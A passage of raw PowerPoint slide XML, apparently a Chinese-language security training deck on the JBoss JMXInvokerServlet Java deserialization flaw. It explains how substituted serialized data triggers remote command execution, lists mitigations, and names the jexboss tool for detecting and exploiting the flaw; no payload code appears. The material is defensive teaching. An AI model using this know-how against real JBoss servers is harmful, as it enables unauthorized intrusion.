                  <a:pt x="10355402" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10355402" y="1574419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10365105" h="1579245">
                <a:moveTo>
                  <a:pt x="10364927" y="1574419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10355402" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10360164" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10364927" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10364927" y="157441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24988"/>
            <a:ext cx="10942549" cy="238655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jboss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配置不当</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457834" marR="298450">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JMX</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>是一个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的管理协议，在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中的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JMXInvokerServlet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>协议与其进行通话，这一通信功能</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>依 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>赖于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的序列化类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57834">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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我们可以通过以下三个面检查下我们自己的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jboss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应用是否存在漏洞利用的风险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457834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）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JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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JMXInvokerServlet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接口（默认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8080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端口）以及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JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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Console</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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/web-console/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）</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="1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 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是否禁止对外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  <a:p>
            <a:pPr marL="457834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）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以上系统是否都有在传输对象内容时，使用序列化技术（二进制流或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base64encode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）</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457834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）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当对这些传输数据截包并且被替换为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="84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“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包含命令执行的序列化内容</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="84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时，远程命令执行即触发</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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使用了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apche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common-collection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库，该库就是当前流行</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="1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800" spc="185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反序列化漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="944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产生的主要原因所在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4020" y="4041647"/>
            <a:ext cx="9677400" cy="1323340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9677400" h="1323339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9677400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677400" y="1322831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13228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9435" y="4036580"/>
            <a:ext cx="9687560" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9687560" h="1333500">
                <a:moveTo>
                  <a:pt x="9682251" y="1332966"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1332966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1332725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1329677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9682251" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="968701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9687013" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9686772" y="1329677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9686099" y="1330998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9685045" y="1332052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9683711" y="1332725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682251" y="1332966"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560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687560" h="1333500">
                <a:moveTo>
                  <a:pt x="967748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677488" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677488" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="1333500">
                <a:moveTo>
                  <a:pt x="9677488" y="1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9677488" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682251" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687013" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687013" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682251" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677488" y="1328204"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="1333500">
                <a:moveTo>
                  <a:pt x="9687013" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9682251" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677488" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687013" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687013" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560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9687560" h="1333500">
                <a:moveTo>
                  <a:pt x="9677488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9677488" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677488" y="1328204"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="1333500">
                <a:moveTo>
                  <a:pt x="9687013" y="1328204"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9677488" y="1328204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682251" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687013" y="1323441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687013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4020" y="4064838"/>
            <a:ext cx="9677400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r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jboss </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>服务需要建议其自己专用户权限，且本账户没有登录权限，实现权限的最小化</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"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2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r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>防火墙策略设置，限定可以连接到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的访问</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IP;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r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>如果是公网服务，就需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jmx-invoker-service.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>中开启权限验证</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"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r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>在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源码中打上最新的官方</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>patch</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>补丁</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"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5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r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>更新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到最新版本，最保险也是最方便的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0"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320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latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>Ja</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>反序列化漏洞的影响</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011936" y="2107692"/>
            <a:ext cx="9677400" cy="1569720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9677400" h="1569720">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9677400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677400" y="1569719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156971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779" y="2102675"/>
            <a:ext cx="9687560" cy="1579245"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9687560" h="1579245">
                <a:moveTo>
                  <a:pt x="9682238" y="1579181"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1579181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1578952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="1578279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1577225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1575892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001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569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9686772" y="1575892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9686086" y="1577225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9685032" y="1578279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9683711" y="1578952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="1579181"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="1579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687560" h="1579245">
                <a:moveTo>
                  <a:pt x="9677476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677476" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="1579245">
                <a:moveTo>
                  <a:pt x="9677476" y="1574419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9677476" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="1574419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="1579245">
                <a:moveTo>
                  <a:pt x="9687001" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9682238" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="1579245">
                <a:moveTo>
                  <a:pt x="9525" y="1574419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="1579245">
                <a:moveTo>
                  <a:pt x="9677476" y="1574419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="1574419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="1579245">
                <a:moveTo>
                  <a:pt x="9687001" y="1574419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9677476" y="1574419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="1569656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="157441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6453"/>
            <a:ext cx="10049510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序列化技术的应用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462915" marR="9588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只要使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="840" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>“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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="840" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>技术的应用都可能存在这个漏洞，像下面的三个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应用都是受到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="840" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>反序列</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>化 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="840" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>影响的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920115" marR="7270115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RMI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远程代码执行</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>；  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JMX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管理扩展</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>；  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JMS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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>消息服务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2915">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="1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即，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>这些</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="1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使用了序列化技术的应用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>其实都可能存在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="165" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="165" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>java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反序列化漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="840" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的隐患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191046"/>
            <a:ext cx="92411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C000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>JMXInvokerServlet/jmx-console/web-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C000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞利用与防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011936" y="2107692"/>
            <a:ext cx="9677400" cy="830580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9677400" h="830580">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9677400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677400" y="830579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="83057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779" y="2102675"/>
            <a:ext cx="9687560" cy="840740"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9687560" h="840739">
                <a:moveTo>
                  <a:pt x="9682238" y="840524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="840524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="840295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="839609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="838555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="837234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001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30999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9686772" y="837234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9686086" y="838555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9685032" y="839609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9683711" y="840295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="840524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="8407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687560" h="840739">
                <a:moveTo>
                  <a:pt x="9677476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677476" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="840739">
                <a:moveTo>
                  <a:pt x="9677476" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9677476" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="840739">
                <a:moveTo>
                  <a:pt x="9687001" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9682238" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="840739">
                <a:moveTo>
                  <a:pt x="9525" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="840739">
                <a:moveTo>
                  <a:pt x="9677476" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9677476" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="9687560" h="840739">
                <a:moveTo>
                  <a:pt x="9687001" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9677476" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9682238" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9687001" y="83576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7723"/>
            <a:ext cx="10049510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JMXInvokerServlet/jmx-console/web-console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漏洞利用与防范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462915">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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https://github.com/joaomatosf/jexboss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920115" marR="438784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jexboss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>是一个使用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>编写的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漏洞检测利用工具，通过它可以检测并利用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web-console</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jmx-console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JMXInvokerServlet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
